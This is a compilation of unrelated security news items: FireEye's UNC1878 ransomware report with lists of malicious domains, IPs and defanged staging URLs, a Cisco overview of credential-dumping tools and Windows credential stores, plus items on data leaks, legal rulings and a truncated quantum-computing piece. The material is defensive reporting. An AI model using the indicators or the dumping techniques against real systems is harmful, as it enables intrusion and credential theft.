With an established modus operandi for UNC1878, our team quickly identified several related intrusions in support of FireEye Mandiant investigations over the next week. Within two days of our initial clustering and expansion of UNC1878 from the original Managed Defense investigation, Mandiant Incident Responders were investigating activity at a U.S. based medical equipment company with several indicators we had previously identified and attributed to UNC1878. Attributed domains, payloads and methodologies provided consultants with a baseline to build detections on, as well as a level of confidence in the actor’s capabilities and speed in which they operate.

Three days later, UNC1878 was identified during another incident response engagement at a restaurant chain. In this engagement, Mandiant consultants found evidence of attempted deployment of RYUK ransomware on hundreds of systems, finally revealing UNC1878’s desired end goal. In the following weeks, we continued to encounter UNC1878 in various phases of their intrusions at several Mandiant Incident Response and Managed Defense customers.

While services data offers us a depth of understanding into these intrusions, we turn to our product telemetry to understand the breadth of activity, getting a better worldview and perspective on the global prevalence of this threat actor. This led to the discovery of an UNC1878 intrusion at a technology company, resulting in Mandiant immediately notifying the affected customer. By correlating multiple UNC1878 intrusions across our services and product customers, it became evident that the targeting was indiscriminate, a common characteristic of opportunistic ransomware campaigns.

Although initially there were unanswered questions surrounding UNC1878’s intent, we were able to provide valuable insights into their capabilities to our consultants and analysts. In turn, the intrusion data gathered during these engagements continued the cycle of building our understanding of UNC1878’s tradecraft, enabling our responders to handle these incidents swiftly in the face of imminent ransomware deployment.

Conclusion

Threat actors continue to use mass malware campaigns to establish footholds into target environments, followed by interactive operations focused on deploying ransomware such as RYUK, DOPPLEPAYMER and MAZE. Looking at the overall trend of intrusions FireEye responds to, the growing shift from traditional PCI theft to ransomware has allowed threat actors such as UNC1878 to widen their scope and increase their tempo, costing organizations millions of dollars due to business disruption and ransom payments. However, apart from their speed, UNC1878 does not stand out among the increasing number of groups following this trend, and should not be the key takeaway of this blog post.

The cycle of analysis and discovery used for UNC1878 lies at the core of our team’s mission to rapidly detect and pursue impactful adversaries at scale. Starting from a singular intrusion at a Managed Defense client, we were able to discover UNC1878 activity at multiple customers. Using our analysis of the early stages of their activity allowed us to pivot and pursue this actor across otherwise unrelated investigations. As we refine and expand our understanding of UNC1878’s tradecraft, our team enables Mandiant and Managed Defense to efficiently identify, respond to, and eradicate a financially motivated threat actor whose end goal could cripple targeted organizations. The principles applied in pursuit of this actor are crucial to tracking any adversary and are ultimately how the Advanced Practices team surfaces meaningful activity across the FireEye ecosystem.

Acknowledgements

Thank you to Andrew Thompson, Dan Perez, Steve Miller, John Gorman and Brendan McKeague for technical review of this content. In addition, thank you to the frontline responders harvesting valuable intrusion data that enables our research.

Indicators of Compromise

Domains

  • aaatus[.]com
  • avrenew[.]com
  • besttus[.]com
  • bigtus[.]com
  • brainschampions[.]com
  • checkwinupdate[.]com
  • ciscocheckapi[.]com
  • cleardefencewin[.]com
  • cmdupdatewin[.]com
  • comssite[.]com
  • conhostservice[.]com
  • cylenceprotect[.]com
  • defenswin[.]com
  • easytus[.]com
  • findtus[.]com
  • firsttus[.]com
  • freeallsafe[.]com
  • freeoldsafe[.]com
  • greattus[.]com
  • havesetup[.]net
  • iexploreservice[.]com
  • jomamba[.]best
  • livecheckpointsrs[.]com
  • livetus[.]com
  • lsassupdate[.]com
  • lsasswininfo[.]com
  • microsoftupdateswin[.]com
  • myservicebooster[.]com
  • myservicebooster[.]net
  • myserviceconnect[.]net
  • myserviceupdater[.]com
  • myyserviceupdater[.]com
  • renovatesystem[.]com
  • service-updater[.]com
  • servicesbooster[.]com
  • servicesbooster[.]org
  • servicesecurity[.]org
  • serviceshelpers[.]com
  • serviceupdates[.]net
  • serviceuphelper[.]com
  • sophosdefence[.]com
  • target-support[.]online
  • taskshedulewin[.]com
  • timesshifts[.]com
  • topsecurityservice[.]net
  • topservicehelper[.]com
  • topservicesbooster[.]com
  • topservicesecurity[.]com
  • topservicesecurity[.]net
  • topservicesecurity[.]org
  • topservicesupdate[.]com
  • topservicesupdates[.]com
  • topserviceupdater[.]com
  • update-wind[.]com
  • updatemanagir[.]us
  • updatewinlsass[.]com
  • updatewinsoftr[.]com
  • web-analysis[.]live
  • windefenceinfo[.]com
  • windefens[.]com
  • winsysteminfo[.]com
  • winsystemupdate[.]com
  • worldtus[.]com
  • yoursuperservice[.]com

IP Addresses

  • 31.7.59.141
  • 45.32.30.162
  • 45.32.130.5
  • 45.32.161.213
  • 45.32.170.9
  • 45.63.8.219
  • 45.63.95.187
  • 45.76.20.140
  • 45.76.167.35
  • 45.76.231.195
  • 45.77.58.172
  • 45.77.89.31
  • 45.77.98.157
  • 45.77.119.212
  • 45.77.153.72
  • 45.77.206.105
  • 63.209.33.131
  • 66.42.97.225
  • 66.42.99.79
  • 79.124.60.117
  • 80.240.18.106
  • 81.17.25.210
  • 95.179.147.215
  • 95.179.210.8
  • 95.179.215.228
  • 96.30.192.141
  • 96.30.193.57
  • 104.156.227.250
  • 104.156.245.0
  • 104.156.250.132
  • 104.156.255.79
  • 104.238.140.239
  • 104.238.190.126
  • 108.61.72.29
  • 108.61.90.90
  • 108.61.176.237
  • 108.61.209.123
  • 108.61.242.184
  • 140.82.5.67
  • 140.82.10.222
  • 140.82.27.146
  • 140.82.60.155
  • 144.202.12.197
  • 144.202.83.4
  • 149.28.15.247
  • 149.28.35.35
  • 149.28.50.31
  • 149.28.55.197
  • 149.28.81.19
  • 149.28.113.9
  • 149.28.122.130
  • 149.28.246.25
  • 149.248.5.240
  • 149.248.56.113
  • 149.248.58.11
  • 151.106.56.223
  • 155.138.135.182
  • 155.138.214.247
  • 155.138.216.133
  • 155.138.224.221
  • 207.148.8.61
  • 207.148.15.31
  • 207.148.21.17
  • 207.246.67.70
  • 209.222.108.106
  • 209.250.255.172
  • 216.155.157.249
  • 217.69.15.175

BEACON Staging URLs

  • hxxp://104.156.255[.]79:80/avbcbgfyhunjmkmk
  • hxxp://149.28.50[.]31:80/adsrxdfcffdxfdsgfxzxds
  • hxxp://149.28.81[.]19:80/ajdlkashduiqwhuyeu12312g3yugshdahqjwgye1g2uy31u1
  • hxxp://45.32.161[.]213:80/ephfusaybuzabegaexbkakskjfgksajgbgfckskfnrdgnkhdsnkghdrngkhrsngrhgcngyggfxbgufgenwfxwgfeuyenfgx
  • hxxp://45.63.8[.]219:80/ajhgfrtyujhytr567uhgfrt6y789ijhg
  • hxxp://66.42.97[.]225:80/aqedfy345yu9876red45f6g78j90
  • hxxp://findtus[.]com/akkhujhbjcjcjhufuuljlvu
  • hxxp://thedemocraticpost[.]com/kflmgkkjdfkmkfl
  • hxxps://brainschampions[.]com:443/atrsgrtehgsetrh5ge
  • hxxps://ciscocheckapi[.]com:80/adsgsergesrtvfdvsa
  • hxxps://cylenceprotect[.]com:80/abresgbserthgsbabrt
  • hxxps://havesetup[.]net/afgthyjuhtgrfety
  • hxxps://servicesbooster[.]org:443/sfer4f54
  • hxxps://servicesecurity[.]org:443/fuhvbjk
  • hxxps://timesshifts[.]com:443/akjhtyrdtfyguhiugyft
  • hxxps://timesshifts[.]com:443/ry56rt6yh5rth
  • hxxps://update-wind[.]com/aergerhgrhgeradgerg
  • hxxps://updatemanagir[.]us:80/afvSfaewfsdZFAesf

#WorldBackupDay: Only 58% of Brits Back Up Their Data

#WorldBackupDay: Only 58% of Brits Back Up Their Data

The majority of British people don't back up their data even though they know how to do it.

New research by Avast published today to coincide with World BackUp Day found that 42% of Brits do not back up their data and files. 

Of those running the gauntlet of data loss in the event of theft, infection, accidental deletion, or destruction, 52% said they didn't keep any information on their device that was important enough to back up.

Other Brits who don't back up their data said that they had intended to get around to it but had not been successful. Of those, 10% said it had slipped their mind, while 13% said that they were too busy with other tasks to find time to back up. 

The remaining 26% of Brits throwing data preservation to the wind by not performing backups confessed that they hadn't bothered to find out how to carry out this simple task.

Of the Brits who do back up their data, 47% do so once a month, while 20% do so continuously and 17% perform a backup every 1 to 6 months.

While 39% of Brits who do actually back up their data do so to cloud storage, the most popular method, practiced by 59% of those surveyed, was to use an external hard drive. 

Android users showed a marked preference for using external hard drives over cloud storage for their backups, while iPhone users were only slightly more likely to choose an external hard drive over the cloud. 

"Losing personal documents, photos and videos can be a painful experience and it’s not until this happens that they realize how valuable it actually is,” said Luis Corrons, security evangelist at Avast. 

“It’s important to back up data on a regular basis, keeping memories, captured in the form of photos and videos, safe and secure.”

Avast researchers recommend backing up data regularly to two locations, in effect creating a backup backup. They also advise users backing up to an external hard drive to protect that drive from ransomware attacks by disconnecting it once the backup is complete. 

Stealing passwords with credential dumping

What’s the quickest way to access a computer? Logging in. As obvious as this may sound, it’s worth reflecting on this. Because while logging in is so second nature that you probably don’t give it much consideration, it’s also one of the most common techniques for taking over a computer.

From a malicious standpoint, stealing and using legitimate credentials to gain access is more likely to go undetected as an attacker attempts to move through a network. Dropping a trojan or exploiting a vulnerability can certainly gain you initial access, but authorized credentials help you navigate laterally under the radar.

It’s no wonder that login credentials are a primary target of bad actors. According to Verizon’s 2019 Data Breach Investigations Report, using stolen credentials was the second-most common activity conducted by attackers during a breach.

So how do bad actors go about stealing credentials? Some techniques are well known, others not as much.

The usual suspects

Phishing emails are by far the most popular method to steal credentials. As we’ve discussed in the past, the scams take many forms, from notifications that there’s a document online that you should view, to notifications of upgrades to your account.

Keyloggers—another common tool for stealing credentials—sit in the background and log keystrokes on a compromised computer. An attacker can load up a keylogger, then wait for it to record credentials as they are input into the computer.

While these are popular methods for stealing credentials, they aren’t the only options. When an attacker gains access to a system, it turns out there’s a veritable gold mine of credentials that they can attempt to access. This is where a technique called credential dumping comes in. While end users may not be aware of it, credential dumping is actually a wildly popular technique whereby an attacker scours a compromised computer for credentials in order to move laterally and/or carry out further attacks. Users may be familiar with headlines touting phishing or keylogging attacks, but credential dumping often receives less wide-spread attention; however, this only underscores the importance of understanding the attack method.

Credential dumping

There are a variety of places within operating systems where credentials are stored for use in everyday operation. If an attacker can gain access to a particular system, they can attempt to locate, copy, and “dump” the credentials.

Credential dumping is possible mainly because software and operating systems have worked to reduce the number of times a user is required to enter their password. Oftentimes, operating systems store passwords in memory, databases, or files. The idea is that the operating system will ask for a password, but then use the cached password for successive logins in the short term, saving the user from having to enter it again.

Tools of the trade

Problems arise when an attacker gains low-level access to a computer. If the attacker can execute code, he or she can extract credentials from memory with various credential dumping tools. There are several tools an attacker can wield to steal credentials in these cases. Tools like gsecdump, creddump, and PWDumpX can be used in a variety of ways to steal credentials.

However, the most popular credential dumping tool by far is Mimikatz. Developed in 2007 by Benjamin Delpy, it began as a tool to highlight a flaw in Microsoft Windows Local Security Authority Subsystem Service (LSASS). LSASS stores credentials so that users don’t have to log in repeatedly each time they want to access system resources. While the flaw in question was eventually fixed, Mimikatz evolved to become an important tool for penetration testers and other security professionals to check for credential dumping weaknesses within systems. Unfortunately, it has become a popular tool for malicious actors as well.

Where to steal

An attacker can pull credentials from different areas on a system. With access to a regular endpoint computer, an attacker can look for credentials in the following locations.

  • WDigest
    This is a legacy protocol used to authenticate users in Windows. When enabled, LSASS keeps a plain-text copy of logged in user’s password in memory. While the service is disabled by default nowadays, it still exists in the latest versions of Windows, and attackers often enable it in order to steal credentials.
  • Security Accounts Manager (SAM)
    This is a database file that’s existed in Windows since the XP days. SAM is used to authenticate users, both local and remote, allowing access when the provide credentials match what SAM has on file. If this file is stolen by attackers, it can potentially be decrypted, and usernames and passwords stored within can be extracted.
  • LSA Secrets
    The Local Security Authority (LSA) manages authentication and the logging in of users on a Windows system, as well as the local security policy for a computer. Sensitive data used by this subsystem is stored in a protected storage area called “LSA secrets.”
  • Kerberos
    The Kerberos protocol was specifically designed for strong, secure authentication. It does so through a ticketing system, granting various permissions to users and services. Attacks against Kerberos generally involve forging or injecting stolen Kerberos tickets to gain access.

    If an attacker manages to get onto a domain controller—the network server responsible for managing authentication on the domain—then there are additional areas where credentials are stored.

  • NTDS
    This is where Active Directory stores information about members of a domain in order to verify users and credentials.
  • Group Policy Preference files
    This Windows tool lets administrators roll up domain policies to include embedded credentials, making administration easier. These policies are generally stored in a share called SYSVOL, which any domain user can view, and potentially decrypt.
  • DCSync
    Instead of a location, DCSync is a technique where an attacker takes advantage of the way domain controllers handle available API calls. In short, the attacker mimics the behavior of another domain controller through API calls and gets the controller to send over credential hashes that can be used in further attacks.

Using the credentials

Once an attacker has gathered credentials, how do they use them? It’s pretty straightforward when it comes to user names and passwords that have been stolen through phishing, keylogging, or stolen and successfully decrypted.

However, not all credentials can easily be decrypted. You may think that that’s the end of line in these cases. Unfortunately, that’s not the case. There’s a whole group of attack techniques centered around using these credentials as-is.

For instance, consider that many user names and passwords are encrypted (a.k.a. “hashed”) on the authenticating server. When you log into one of these services, they generally decrypt the password on the server and compare them. Another way to compare is to encrypt the password that arrives, then compare it to the encrypted password on file. Either way, if there’s a match, access is granted.

If an attacker manages to steal user credentials, but can’t decrypted them, they can attempt to pass them to the authentication server. If the server simply compares the two hashed passwords, and if they match, access is granted. This technique is often called “passing the hash.”

There are a number of similar authentication attacks. For instance, an attacker could also dump Kerberos tickets from a compromised system, then use them to attempt to log in in a similar fashion. As a variation of the overall theme, this attack is called “pass the ticket.”

There are plenty of variations out there. An attacker can “overpass the hash,” by which they pass a hash to an NT LAN Manager in the hopes that it will pass them back a Kerberos ticket, which they can then use to log into network resources. There are also techniques that can grant them “golden” and “silver” Kerberos tickets, which as the names suggest, offer elevated privileges and access throughout a network administered by Kerberos.

What to do

Fortunately, there are many ways to defend against credential dumping.

  • Monitor access to services like LSASS and databases like SAM.
  • Keep an eye out for command-line arguments used in credential dumping attacks.
  • On domain controllers, monitor logs for unscheduled activity.
  • Look out for unexpected connections from IP addresses not assigned to known domain controllers.

The security capabilities found in AMP for Endpoints can continuously analyze and monitor file and process activity. AMP can automatically generate alerts at the first sign of malicious behavior, such as when an attacker attempts to spawn an unauthorized LSASS process, quickly stopping attacks in their tracks before they can cause any further damage.

Of course, if an attacker does manage to steal credentials, using multi-factor authentication (MFA) can prevent the attacker from actually using them to gain access to other systems. Cisco Duo protects your systems by using a second source of validation to verify user identity before granting access.

Even better, combine the powers of AMP and Duo to reduce the attack surface by allowing AMP to notify Duo when an endpoint has potentially been compromised, allowing Duo to automatically block that endpoint from accessing critical apps that Duo is protecting.

A zero-trust strategy can also go a long way to limit or prevent an attacker from moving laterally through a network. Cisco Identity Services Engine simplifies the delivery of consistent, highly secure access control across all network connections. With far-reaching, intelligent sensor and profiling capabilities, ISE can reach deep into the network to deliver superior visibility into who and what are accessing resources, preventing unwanted access as a result.

Enjoyed reading this Threat of the Month? Subscribe to the Threat of the Month blog series and get alerted when new blogs are published. 

The post Stealing passwords with credential dumping appeared first on Cisco Blogs.

42 million records of Iranian users of unofficial Telegram fork leaked online

Security expert Bob Diachenko discovered that 42 million Iranian ‘Telegram’ user IDs and phone numbers have been leaked online.

Comparitech along with the popular researcher Bob Diachenko discovered 42 million Iranian ‘Telegram’ user IDs and phone numbers online.

The accounts belong to Iranian users, they are from a third-party version of the Telegram app.

Telegram is the most popular messaging app in Iran, with more than 50 million registered users nationwide. It’s used by dissidents and government opponents because its conversations can’t have eavesdropped.

Telegram was blocked permanently in early 2018 following local anti-government protests and civil unrest. Since 2018, many users continue the access it through proxies and VPNs, others use third-party unnofficial fork versions.

The data was published by a group called “Hunting system” (translated from Farsi) on an unsecured Elasticsearch cluster. The archive was shut down after Diachenko reported the incident to the hosting provider on March 25.

unofficial telegram form online

According to Telegram, the data came from an unofficial “fork” of Telegram, this is possible because the popular instant messaging app is an open-source application that allows third parties to develop their own versions. The availability of unofficial fork of the app is not surprising because the official Telegram app is frequently blocked in Iran.

“We can confirm that the data seems to have originated from third-party forks extracting user contacts. Unfortunately, despite our warnings, people in Iran are still using unverified apps. Telegram apps are open source, so it’s important to use our official apps that support verifiable builds.” a Telegram spokesperson told Comparitech.

The bad news is that other unauthorized parties might have accessed the data while it was exposed, experts reported that at least one user had posted the data to a hacker forum.

The exposed data poses a serious risk to users in a country like Iran, nation-state actor could use them to target specific individuals that use Telegram (or a fork of the instant messaging app) for surveillance purposes.

The exposed records included user data originating from Iran, such as User account IDs, Usernames, Phone numbers, Hashes, and secret keys.

The experts pointed out that hashes and secret keys can’t be used to access accounts.

“They only work from inside the account to which they belong, according to a Telegram spokesperson.” continues the post.

Below the timeline of the exposure:

  • March 15: The database was indexed by search engine BinaryEdge
  • March 21: Diachenko discovered the exposed data and began investigating
  • March 24: Diachenko sent an abuse report to the hosting provider
  • March 25: The Elasticsearch cluster was deleted.

Pierluigi Paganini

(SecurityAffairs – privacy, data leak)

The post 42 million records of Iranian users of unofficial Telegram fork leaked online appeared first on Security Affairs.

Sensitive Voter Data Exposed by App Used in US Elections

Sensitive Voter Data Exposed by App Used in US Elections

Sensitive information about US voters was left exposed due to a data breach by the voter contact and canvassing app Campaign Sidekick, which is used by the Republican party in election campaigns. It has been revealed by the cybersecurity company UpGuard that an unprotected copy of Campaign Sidekick’s app’s code was mistakenly left freely available on its website. The breach has since been secured.

Originating during the 2002 election cycle, Campaign Sidekick has been used to help digitalize election campaigning as part of a wider approach by the Democratic and Republican parties to capture, unify, analyze and act on data about US voters. The Campaign Sidekick app helps collate information from interactions that take place with voters during canvassing.

On February 12 2020, UpGuard found that the git directory on app.campaignsidekick.vote was publicly available online. The files were downloaded and discovered to contain some sensitive data, following which the analyst informed Campaign Sidekick of the breach. Following communication between the two organizations, the breach was secured on February 15 2020.

With extensive data analytics now used in election cycles, it is critical that political parties have the most rigorous cybersecurity techniques and practices in place to protect individuals’ data.

“Organizations need to understand the ease with which attackers can access sensitive data by exploiting vulnerable third parties. Political campaign staffs rely on a broad ecosystem of third parties to help them do business, and it only takes one mistake within a single app to expose sensitive voter data,” commented Kelly White, CEO, RiskRecon.

“Any organization involved in maintaining the integrity of elections – from campaign staffs to party officials to state and local election boards – needs to better understand the security practices of all parties in the data chain of custody and hold those parties accountable.”

There have been several high profile election data breaches in recent years, including leaked emails relating to Hillary Clinton’s campaign to run for Senate.

Clarifying the Computer Fraud and Abuse Act

A federal court has ruled that violating a website's tems of service is not "hacking" under the Computer Fraud and Abuse Act.

The plaintiffs wanted to investigate possible racial discrimination in online job markets by creating accounts for fake employers and job seekers. Leading job sites have terms of service prohibiting users from supplying fake information, and the researchers worried that their research could expose them to criminal liability under the CFAA, which makes it a crime to "access a computer without authorization or exceed authorized access."

So in 2016 they sued the federal government, seeking a declaration that this part of the CFAA violated the First Amendment.

But rather than addressing that constitutional issue, Judge John Bates ruled on Friday that the plaintiffs' proposed research wouldn't violate the CFAA's criminal provisions at all. Someone violates the CFAA when they bypass an access restriction like a password. But someone who logs into a website with a valid password doesn't become a hacker simply by doing something prohibited by a website's terms of service, the judge concluded.

"Criminalizing terms-of-service violations risks turning each website into its own criminal jurisdiction and each webmaster into his own legislature," Bates wrote.

Bates noted that website terms of service are often long, complex, and change frequently. While some websites require a user to read through the terms and explicitly agree to them, others merely include a link to the terms somewhere on the page. As a result, most users aren't even aware of the contractual terms that supposedly govern the site. Under those circumstances, it's not reasonable to make violation of such terms a criminal offense, Bates concluded.

This is not the first time a court has issued a ruling in this direction. It's also not the only way the courts have interpreted the frustratingly vague Computer Fraud and Abuse Act.

COVID-19: How Do I Work from Home Securely?

The coronavirus pandemic—the infection officially designated as COVID-19—is causing upheaval across the globe. Aside from the serious economic and public health implications, one very practical impact of shelter-in-place dictums is to force many companies to support remote working where they can. The most recent data tells us that in 2017, eight million Americans worked from home at least some of the week — amounting to around 5% of US workers. However, the events of the past few weeks are driving what is being described in certain sectors as the biggest shift to home working since 9/11.

This will ensure that many companies can continue functioning while helping to achieve social distancing to minimise the spread of the virus. But there are challenges, particularly to smaller businesses who don’t have IT security teams to assist with the transition. Hackers are primed and ready to take advantage of home workers, whose machines and devices may not be as secure as those in the office. There’s also a risk that workers are more distracted by current events when working at home, creating more opportunities for cyber-criminals to strike.

This isn’t just about hackers stealing your personal log-ins and information to sell on the dark web. In a home-working context, corporate data and systems may also be at risk. It takes just one unsecured remote worker to let the bad guys in. The damage they end up doing may be particularly difficult for employers to weather given the extreme economic pressures already on many firms.

With that in mind, therefore, let’s take a look at some of the major threats to home workers and their organizations, and what can be done to keep the hackers at bay.

The main threats

Phishing messages are by far the number one threat to home workers. Cyber-criminals are using widespread awareness of COVID-19, and a desire for more information on the outbreak, to trick users into clicking on malicious links or opening booby-trapped attachments. Many are spoofed to appear as if sent by trusted organizations such as the US Centers for Disease Control and Prevention (CDC) or the World Health Organization (WHO). They may claim to offer more information on the spread of the outbreak, tips on staying safe, and even provide details of how to get a non-existent vaccine online.

If you click through on a malicious link, the next stage of the attack could:

  • Take you to a convincing-looking log-in page (e.g., for Microsoft Outlook, Office 365, or any popular cloud apps) where your username and password could be harvested by hackers. With these, they have a foothold in the organization which could provide the foundation for a serious information-stealing attack.
  • Covertly initiate a malware download. This malware could exploit unpatched vulnerabilities on your computer to infect not just your machine but the entire corporate network it’s connected to, with ransomware, cryptojacking malware, banking trojans, information-stealing threats, and much more.

Brute forcing is another way for hackers to hijack your cloud accounts. They use previously breached username/password combos and run them through automation software to try them across billions of websites and apps. Because users reuse passwords across numerous accounts, the bad guys often get lucky and are able to unlock additional accounts in this way. Home workers using Microsoft Teams, Slack, Zoom and other cloud platforms for collaboration and productivity may be targeted.

Malicious smartphone apps are another threat to home workers. These may be disguised to trick the user into believing they’re downloading a COVID-19 tracker, for example. In reality, it could infect the device with ransomware, info-stealers, or other malware. That device could then spread the same malware to the corporate network, if it is connected to it via the home network.

Smart device threats are also a concern for home workers. More and more of us are investing in smart home devices. From voice assistants to smart speakers, connected refrigerators to smart TVs, it’s estimated that there’ll be as many as 128 million smart homes in the US by the end of this year. However, often these consumer-grade devices don’t have strong built-in protection. They may use weak, factory default passwords and/or contain multiple software vulnerabilities which are rarely patched by the manufacturer, if at all. The risk is that hackers could hijack one or more of these devices and use them as a stepping stone into the home and then corporate network – as we’ve demonstrated in previous research.

Friends and family could also introduce new cyber-threats, as they will also be confined largely to the home. That means they’ll be logging on to the home network with their own mobile devices, which may not be as well protected from threats as they should be. Once again, such threats could spread quickly from the home network to infect the enterprise network if it’s connected without adequate security controls. Another risk is of children using unsecured remote learning platforms, which may offer cybercriminals opportunities to hijack accounts, steal information and spread malware onto the network.

What are the hackers after?

Home workers represent an attractive target in their own right. After all, personal information and log-ins (home banking, Netflix, webmail etc) can be easily sold for a profit on dark web marketplaces. However, organizations represent a much bigger, potentially more lucrative pay day for cyber-criminals. While corporate PCs and networks might be fairly well secured, the rush to support home working may have left gaps the bad guys are keen to exploit.

By first compromising the home worker, and then pivoting through unsecured channels to the corporate network, hackers could spread ransomware, steal sensitive company IPs, infect work networks with crypto-mining malware, or steal large volumes of customer data. They may also look to hijack employees’ corporate email or other accounts as the first part of a multi-stage information-stealing attack. There have even been new warnings of Business Email Compromise (BEC) attacks in which employees (usually those working in the finance department) are contacted by someone posing as a senior exec and ordered to wire business funds to a new bank account.

Working safely at home

With so many techniques at their disposal, it’s easy to imagine that the bad guys have the upper hand. But by putting a few best practices in place, there are things businesses and employees can do today to reduce home working security risks.

Consider the following:

  • User awareness exercises to improve the ability of home workers to spot phishing attacks.
  • Ensure all home workers are outfitted with anti-malware for any devices used for work. Trend Micro Maximum Security is an excellent place to start for PCs and Macs, while Trend Micro Mobile Security can help secure Android and Mobile devices.
  • Require strong, unique passwords for all accounts, stored in a password manager, such as Trend Micro Password Manager.
  • Enhance the above by switching on two-factor authentication for all enterprise accounts that have it (including any cloud platforms).
  • Always use a VPN for communication between home and corporate networks.
  • Ensure staff have a clear route to report any security incidents.
  • Switch on automatic updates for all home computer systems (operating systems and software).
  • Ensure smart home devices are on latest software version and have strong passwords or 2FA.
  • Use a network security solution like Trend Micro Home Network Security to secure your home network. It not only provides a secure baseline for working at home, with its web and content threat protections; you can block your kids’ use of the internet and YouTube while you’re having conference calls or doing other bandwidth-intensive work on the remotely-accessed corporate network.
  • Tightly enforce endpoint security policies: if possible, only allow work devices to connect to the corporate network, and/or employee devices that have been previously scanned for threats.

We don’t know how long COVID-19 will last. But by adapting to the new reality as quickly as possible, businesses and their home workers can at least close down any security gaps, enabling them to be as productive as possible — while most importantly, staying safe and healthy.

The post COVID-19: How Do I Work from Home Securely? appeared first on .

To Tune Up Your Quantum Computer, Better Call an AI Mechanic

A high-end race car engine needs all its components tuned and working together precisely to deliver top-quality performance. The same can be said about the processor inside a quantum computer, whose delicate bits must be adjusted in just the right way before it can perform a calculation. Who’s the right mechanic for this quantum tuneup job? According to a team that includes scientists at the National Institute of Standards and Technology (NIST), it’s an artificial intelligence, that’s who. The team’s paper in the journal Physical Review Applied outlines a way to teach an AI to make an

FBI warns of nation-state actors using the Kwampirs malware

For the third time in a few weeks, the FBI has issued an alert about supply chain attacks carried out by nation-state actors using the Kwampirs malware.

The FBI has issued an alert about supply chain attacks using the Kwampirs malware as part of a hacking campaign carried out on a global scale by state-sponsored hackers.

The FBI has issued an alert on Monday about state-sponsored hackers using the Kwampirs malware to attack supply chain companies and other industry sectors as part of a global hacking campaign.

Feds warn of Coronavirus attacks aimed at organizations in the healthcare industry.

“Since at least 2016, the FBI has observed an Advanced Persistent Threat (APT) actor conduct a global network exploitation campaign using the Kwampirs Remote Access Trojan (RAT) and is providing additional, non-technical information in an effort to highlight key objectives of the actor campaign. This information, along with previously released FBI Liaison Alert System (FLASH) messages, is intended to enhance the network defense posture of public and private partners.” reads the alert issued by FBI.

The Kwampirs RAT is a modular RAT worm used as a reconnaissance tool, if compromised machine contains data of interest the backdoor “aggressively” spread among other systems with open network shares.

The RAT was first analyzed by Symantec researchers in April 2018, when the researchers uncovered the activity of a cyber espionage group tracked as Orangeworm that targeted organizations in the healthcare sector.

“The Kwampirs RAT is a modular RAT worm that gains system access to victim machines and networks, with the primary purpose of gaining broad, yet targeted, access to victim companies enable follow-on computer network exploitation (CNE) activities.” continues the alert. “Through victimology and forensic analysis, the FBI found heavily targeted industries include healthcare, software supply chain, energy, and engineering across the United States, Europe, Asia, and the Middle East. Secondary targeted industries include financial institutions and prominent law firms.”

The FBI already published two Flash alerts, one containing YARA rules related to the Kwampirs malware and a complete technical report of the threat.

According to the FBI, the group behind these attacks has been active since 2016, but a report published in 2018 by Symantec revealed that the Orangeworm APT was first spotted in January 2015.

Symanted pointed out that the APT group appears to be focused on the healthcare industry, 40% of the targets belong to this industry

The FBI confirmed that the APT group broke into target networks belonging to major transnational healthcare companies, hospital organizations, and other organizations in other industries.

Kwampirs operations against global healthcare entities have been effective, gaining broad and sustained access to targeted entities. Targeted entities range from major transnational healthcare companies to local hospital organizations. The scope of infections has ranged from localized infected machine(s) to enterprise infections. During these campaigns, the Kwampirs RAT performed daily command and control communications with malicious IP addresses and domains that were hard-coded in the Kwampirs RAT malware. The FBI assesses Kwampirs actors gained access to a large number of global hospitals through vendor software supply chain and hardware products. Infected software supply chain vendors included products used to manage industrial control system (ICS) assets in hospitals.” states the FBI.

Another element that emerged from the FBI alert are the similarities between the Kwampirs malware and Disttrack, which is a wiper also known as Shamoon, that was employed in attacks attributed to Iran-linked APT groups.

At the time is not clear is the FBI issued the alert following recent attacks targeting healthcare organizations.

Pierluigi Paganini

(SecurityAffairs – FBI, hacking)

The post FBI warns of nation-state actors using the Kwampirs malware appeared first on Security Affairs.

NATO Report Warns of New Authoritarian Chinese Splinternet

NATO Report Warns of New Authoritarian Chinese Splinternet

Chinese government plans to push through standardization of a new internet architecture could broaden the threat landscape, destabilize security and privacy, and fragment the world wide web, a new NATO report seen by Infosecurity will warn.

First proposed at the UN’s International Telecommunication Union (ITU) last September, the plans call for a replacement to the current TCP/IP model, dubbed “New IP.” They’re being led by Huawei, China’s state-run telcos and the government itself.

Published by the FT, the plans claimed that TCP/IP is broken, incapable of supporting IoT advances, space-terrestrial communications and other innovations coming down the line, such as holographic comms. 

It also points to security vulnerabilities in the current model and claimed its “ubiquitous, universal and better protocolled system” would provide improved security and trust for the internet.

However, an upcoming report from Oxford Innovation Labs (Oxil) for NATO is extremely apprehensive of the plans. China is effectively “creating a perception of necessity” for its new model when in fact TCP/IP is far from completely broken — in fact, it has adapted consistently well to everything thrown at it over the years, it says.

Even worse, the New IP model for a decentralized internet infrastructure (DII) will undermine security and embed “fine-grained controls in the foundations of the network” — ultimately putting more control into the hands of the ISPs.

“New IP would centralize control over the network into the hands of telecoms operators, all of which are either state run or state-controlled in China,” the report authors told Infosecurity. “So, internet infrastructure would become an arm of the Chinese state.”

New IP also includes plans for an object identifier resolution system to replace the current Domain Name System (DNS), ostensibly to improve performance, stability, privacy and security. But Oxil claimed: “The use of alternate technologies for identification on the internet and the DNS would lead to less predictability in cyberspace and new questions around norms and governance.”

It also criticized the New IP plans for distributed ledger technology (DLT), which China claimed is necessary to counter overt centralization of internet architecture, in the hands of IANA, CAs and other bodies.

In the Chinese model, governments are likely to have control over the DLT, thus enabling mass surveillance, Oxil argued.

“It is not uncommon for language of ‘trust’ to replace ‘security’ in Chinese DII-related discussions. This is concerning because it indicates that the principle of ‘security by design’ – at least in the Western context – is not being adopted in DII’s development. In the long-term this could negatively impact cybersecurity globally,” the report claimed.

The plans are being pushed through at pace at an ITU level, with Oxil and other UN delegates alarmed at the speed such radical changes are being proposed, and the impact of global standardization of New IP.

It will “increase the threat landscape by introducing new security uncertainties across the stack” and provide authoritarian governments everywhere with a new model for controlling the populace, Oxil warned.

The fragmentation of the global internet into national, government-run “intranets,” will also undermine the predictability of cyberspace and NATO’s ability to protect and defend its networks, it continued.

“A proliferation of alternate internet technologies will increase the internet’s threat landscape, decrease predictability, and potentially destabilize existing and future norms for responsible state behavior in the online environment,” the report concluded.

Kwampirs threat actor continues to breach transnational healthcare orgs

